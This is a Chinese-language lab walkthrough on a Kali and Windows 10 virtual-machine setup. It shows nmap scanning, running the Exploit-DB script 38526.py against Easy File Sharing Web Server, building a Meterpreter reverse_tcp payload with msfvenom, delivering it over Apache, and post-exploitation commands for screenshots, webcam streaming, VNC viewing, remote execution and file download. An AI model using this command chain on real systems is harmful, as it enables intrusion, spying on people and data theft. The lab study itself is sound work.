赞
踩
复现过程
实验环境:
攻击机:kali Linux2
靶机:win10x64
网络连接方式:NAT
kali和windows的虚拟机都可以在网上找到下载文件,这里提供一个网站可以下载windows的虚拟机,根据需要选择自己需要的版本就可以了。
https://www.xitongku.com/
(1)在靶机(win10)上运行Easy File Sharing Web Server
注意事项:port端口的选择要选择一个没有被其他应用占用的端口
(2)扫描一下kali,发现了win10的靶机
扫描口令:nmap -sV +kali 的IP地址
(3)得到了靶机的IP地址后,再扫描靶机的端口运行的软件版本,可以发现8000端口提供的Easy File Sharing Web Server 服务。
口令:nmap -sV +靶机IP地址
(4)用searchsploit命令查找一下
口令:searchsploit easy file sharing
可以看到下图的表分为两列,左边一列给出了漏洞渗透模块的名称,右边一列给出了所在的位置。
(5)选用38526.py的远程溢出漏洞渗透模块为例,对应所在位置为/usr/share/exploitdb/exploits/windows/remote/38526.py。这是一个python编写的脚本。在终端输入指令:python2 /usr/share/exploitdb/exploits/windows/remote/38526.py +靶机IP地址 端口号
注意事项:输入指令一定要输入python2,我之前一直输入python一直不成功。
(6)连接成功打开win10的靶机发现,EasyFileSharing这个服务器程序已经崩溃,另外渗透模块成功地在目标主机上启动了计算器程序。
实验环境:
攻击机:kali Linux2
靶机:win10x64
网络连接方式:NAT
在kali中输入命令“msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP地址 lport=5555 -f exe -o /root/payload.exe”
lport那里是端口号,我用的是5555,root后面的文件名也可以自己设置,我设置的是payload,但要注意后缀名是exe可执行文件。
这里使用最点单的msfvenom命令来生成一个被控端程序,使用的被控端程序就是一个用于windows平台下的反向远程控制程序:windows/meterpreter/reverse_tcp,它的参数lhost的值为kali的IP地址,生成的文件如下图所示。
主控端需要在Metasploit中启动
POC,全称为"ProofofConcept”,中文是“概念验证”,常指一段漏洞证明的代码。
EXP,全称”Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。
Metasploit框架是可以添加漏洞代码片段,就好比一个军火库,它里面有各种武器供大家使用,当然也有新的武器被研发出来,放到武器库里面后,都可以使用,这就是框架的好处,新的攻击代码可以比较容易的加入MSF框架供大家使用。
Meterpreter中支持的命令有很多,一共分成9个种类,具体的可以去网上搜查相关资料,这里不做过多赘述。
(1)打开终端然后输入msfconsole就可以启动Metasploit
(2)启动handler命令
口令:use exploit/mult/handler
(3)设置payload
(4)修改LHOST参数
(5)修改LPORT参数
(6)输入“exploit”开启监听
(7)靶机运行payload.exe文件
运行后,kali上就会在Metasploit中打开了一个session,这表示从现在开始我们就可以通过被控端程序来控制目标计算机了。
注意事项:想要实现Metasploit的具体应用,需要靶机运行payload.exe这个kali生成的执行文件,将kali中的payload.exe移到靶机中的相关方法,可以在网上搜查,我的虚拟机不能直接利用VMtools直接移动,所以我是利用网站来下载的。具体方法如下:
(1)进入payload文件存放路径,将此文件复制到/var/www/html
口令:cp -v payload.exe /var/www/html(-v参数是显示详细信息,可加可不加)
进入目录/var/www/html/,将html目录下的其余文件删除
口令:rm 文件1 文件2 ……文件n
(2)开启apache服务
Apache是一种常见的Web服务器软件,广泛用于Linux和其他UNIX操作系统上。它是自由软件,可以通过开放源代码的方式进行自由分发和修改。Apache提供了处理静态和动态内容的能力,而且还支持多种编程语言和脚本,如PHP、Python和Perl。此外,Apache还支持SSL、TLS和虚拟主机等功能,可以很好地满足大量的Web应用程序的需求。
口令:/etc/init.d/apache2 start
查看服务开启的状态
口令:/etc/init.d/apache2 status
(3)在win10靶机上打开浏览器,输入kali的IP,就可以下载payload文件了
(1)获取靶机基本信息
口令:sysinfo
(2)获取靶机屏幕截图
口令:screenshot
由上图的提示,图片已经被保存到var/ww/html目录下,打开文件夹,即可查看到图片
(3)摄像头
查看靶机有几个摄像头:webcam_list
靶机舍友头视频获取:webcam_stream
由于这里的靶机是Win10,没有摄像头
(4)查看靶机当前目录文件
口令:dir
由于payload.exe文件是在Downloads这个文件夹中,故显示的就是这个文件夹的文件
(5)在靶机上启动程序
这里以启动靶机上的计算器为例
口令:execute -f calc.exe
返回靶机,可以看到计算器已经被启动
(6)查看靶机的实时屏幕
口令:run vnc
(1)输入命令“ls”,查看到的是payload.exe这个文件所在文件夹的文件
(2)使用命令“download 文件名”即可下载文件
下载的路径为默认路径
打开文件夹即可看到下载的文件
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。